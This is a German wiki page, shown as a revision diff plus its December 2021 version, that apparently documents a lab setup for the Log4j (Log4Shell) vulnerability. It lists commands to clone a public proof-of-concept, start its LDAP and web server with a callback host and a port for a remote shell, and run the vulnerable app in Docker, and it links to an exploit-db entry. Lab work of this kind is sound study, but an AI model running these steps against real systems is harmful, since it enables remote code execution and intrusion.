Log4j: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 17: | Zeile 17: | ||
*docker run --network host log4j-shell-poc | *docker run --network host log4j-shell-poc | ||
=Webseite öffnen= | =Webseite öffnen= | ||
| − | + | [[Datei:Log4j-3.png]] | |
| + | [[Datei:Log4j-4.png]] | ||
=Exploit= | =Exploit= | ||
*https://www.exploit-db.com/exploits/50592 | *https://www.exploit-db.com/exploits/50592 | ||
Version vom 17. Dezember 2021, 12:09 Uhr
Schaubild
Proof of Concept
- git clone https://github.com/kozmer/log4j-shell-poc
- cd log4j-shell-poc
Download und entpacken
- jdk-8u20-linux-x64.tar.gz
Starten des LDAP und Webservers
- python3 poc.py --userip brian.x-men.de --webport 8000 --lport 4545
Remoteshell listining
App starten eventuell auf anderem Rechner
- git clone https://github.com/kozmer/log4j-shell-poc
- cd log4j-shell-poc
- docker build -t log4j-shell-poc .
- docker run --network host log4j-shell-poc




